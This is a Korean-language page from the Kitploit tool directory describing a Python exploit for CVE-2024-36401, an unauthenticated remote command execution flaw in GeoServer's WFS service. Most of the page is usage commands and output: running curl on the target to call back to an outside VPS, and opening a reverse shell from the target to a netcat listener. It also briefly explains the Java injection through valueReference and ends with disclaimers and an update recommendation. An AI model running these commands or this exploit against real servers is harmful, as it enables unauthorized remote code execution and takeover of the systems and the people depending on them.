Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-36401 — "GeoServer"용 Python Exp | Kitploit
도구/GitHubGitHub/urjack2025/cve-2024-36401
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHuburjack2025/cve-2024-36401

CVE-2024-36401

"GeoServer"용 Python Exp

저장소 보기
210개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-36401 GeoServer 취약점 활용 도구

취약점 개요

CVE-2024-36401은 GeoServer의 원격 명령 실행 취약점으로, 공격자는 특정 WFS(Web Feature Service) 요청을 구성하여 인증 없이 임의 명령을 실행할 수 있습니다.

환경 요구 사항

  • Python 3.x
  • 필수 의존성 설치: pip install requests

사용 방법

이 도구는 cmd 모드(직접 명령 실행)와 reverse 모드(리버스 셸 생성) 두 가지 사용 모드를 지원합니다.

1. 대상이 외부 네트워크에 연결 가능한지 테스트

VPS 주소가 111.46.112.85라고 가정하고, cmd 모드로 curl 명령을 실행하여 대상 서버가 외부 네트워크에 접근할 수 있는지 테스트합니다:

root@kitploit:~
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"

검증 방법: VPS에서 HTTP 서버를 시작하여 요청을 수신합니다

root@kitploit:~
# VPS에서 실행
python -m http.server 8090

콜백 정보를 성공적으로 수신하면 다음과 유사한 출력이 표시됩니다:

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -

2. 리버스 셸 연결 설정

reverse 모드를 사용하여 지정된 VPS 및 포트로 리버스 셸 연결을 설정합니다:

1단계: VPS에서 리슨 포트 설정

root@kitploit:~
# VPS에서 실행
nc -lvp 6666

2단계: 취약점 활용 도구를 실행하여 리버스 연결 시작

root@kitploit:~
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666

실행 후 도구는 다음과 유사한 출력을 표시합니다:

root@kitploit:~
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea

이때 활용에 성공하면 VPS의 nc 리슨이 리버스 셸 세션을 수신하게 됩니다.

도구 매개변수 설명

root@kitploit:~
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
  • cmd: 단일 명령 실행 모드
  • reverse: 리버스 셸 모드
  • <target>: 대상 서버 주소 및 포트, 형식은 ip:port
  • <command>: 대상 서버에서 실행할 명령
  • <vps_ip>: VPS 서버의 IP 주소
  • <vps_port>: VPS에서 리슨하는 포트 번호

취약점 원리

이 취약점은 GeoServer WFS 서비스의 보안 결함을 이용하며, valueReference에 Java 코드를 주입하여 시스템 명령을 실행합니다. 도구는 악성 코드가 포함된 XML Payload를 구성하여 GeoServer의 WFS 인터페이스로 전송함으로써 원격 명령 실행을 달성합니다.

주의 사항

  1. 이 도구는 보안 연구 및 취약점 검증 용도로만 사용하십시오. 승인되지 않은 테스트에 사용하지 마십시오.
  2. 이 도구를 사용하여 발생하는 모든 결과에 대한 책임은 사용자 본인에게 있습니다.
  3. 리버스 셸 기능 사용 시 대상 시스템에 접근 권한이 있고 관련 법규가 허용하는 범위 내에서 작업을 수행해야 합니다.
  4. 모의 훈련(CTF) 테스트 환경인 경우, 환경 구축자가 난이도를 높이기 위해 일부 기본 라우팅을 수정하여 제공된 EXP를 사용하지 못하게 할 수 있습니다. 이 경우 /geoserver/wfs 필드를 해당 내용으로 수정해야 할 수 있습니다.

수정 권장 사항

GeoServer를 공식 보안 버전으로 신속하게 업데이트하고, 보안 모범 사례에 따라 서버를 구성하십시오.

도구 다운로드